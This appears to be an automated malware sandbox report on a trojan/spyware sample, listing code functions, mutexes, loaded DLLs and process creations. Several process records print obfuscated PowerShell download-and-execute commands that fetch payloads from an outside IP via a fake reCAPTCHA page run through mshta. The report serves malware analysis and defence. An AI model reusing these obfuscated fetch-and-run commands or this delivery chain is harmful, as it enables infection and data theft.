Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_064C2388	12_2_064C2388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_064C0006	12_2_064C0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_064C1E2E	12_2_064C1E2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_064C1E37	12_2_064C1E37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_064C1F25	12_2_064C1F25
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00440A0D	13_2_00440A0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0040AE60	13_2_0040AE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00408740	13_2_00408740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00430050	13_2_00430050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00411078	13_2_00411078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0042A810	13_2_0042A810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00433810	13_2_00433810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004270D0	13_2_004270D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004058E0	13_2_004058E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0042D893	13_2_0042D893
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004148B0	13_2_004148B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004288BA	13_2_004288BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00436140	13_2_00436140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00415975	13_2_00415975
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0040A910	13_2_0040A910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00441910	13_2_00441910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00403920	13_2_00403920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0043912C	13_2_0043912C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004091C0	13_2_004091C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004161DF	13_2_004161DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004311E6	13_2_004311E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00432188	13_2_00432188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00406190	13_2_00406190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0042F195	13_2_0042F195
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004421B0	13_2_004421B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041E250	13_2_0041E250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00441A56	13_2_00441A56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00427A50	13_2_00427A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041B200	13_2_0041B200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004042D0	13_2_004042D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041BAD0	13_2_0041BAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00433AD0	13_2_00433AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00431A88	13_2_00431A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00441A94	13_2_00441A94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041AA90	13_2_0041AA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00442A90	13_2_00442A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004082A0	13_2_004082A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041CAA0	13_2_0041CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0043CAA7	13_2_0043CAA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004412B1	13_2_004412B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00441B40	13_2_00441B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041C370	13_2_0041C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00420B10	13_2_00420B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402B20	13_2_00402B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00411B20	13_2_00411B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0042ABC0	13_2_0042ABC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00441BD0	13_2_00441BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004273A0	13_2_004273A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00420440	13_2_00420440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0043AC40	13_2_0043AC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00410446	13_2_00410446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00417451	13_2_00417451
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00441C60	13_2_00441C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00442460	13_2_00442460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00419470	13_2_00419470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00404C00	13_2_00404C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00407400	13_2_00407400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0043C410	13_2_0043C410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0042ECD0	13_2_0042ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00439CD8	13_2_00439CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00440CD8	13_2_00440CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00414C9C	13_2_00414C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0042CCA0	13_2_0042CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0040E4B0	13_2_0040E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00426D70	13_2_00426D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00428D76	13_2_00428D76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A574	13_2_0041A574
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00422D17	13_2_00422D17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00405DC0	13_2_00405DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004245C0	13_2_004245C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00442DE0	13_2_00442DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004165EE	13_2_004165EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00415590	13_2_00415590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004095A0	13_2_004095A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00415E42	13_2_00415E42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00423E44	13_2_00423E44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00413E50	13_2_00413E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041BE00	13_2_0041BE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00406620	13_2_00406620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0042DEE5	13_2_0042DEE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402EF0	13_2_00402EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0043EE80	13_2_0043EE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0040D690	13_2_0040D690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0043AEA0	13_2_0043AEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0043974A	13_2_0043974A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00419710	13_2_00419710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041F710	13_2_0041F710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041C7D0	13_2_0041C7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004427E0	13_2_004427E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00427F8D	13_2_00427F8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0043B7B0	13_2_0043B7B0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00413E40 appears 128 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00407F90 appears 52 times

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winPS1@20/19@13/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 13_2_00430050 CoCreateInstance,

13_2_00430050

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\recaptcha-verify[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1988:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\3e74489724f9
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4256:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uc2khghg.lt3.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
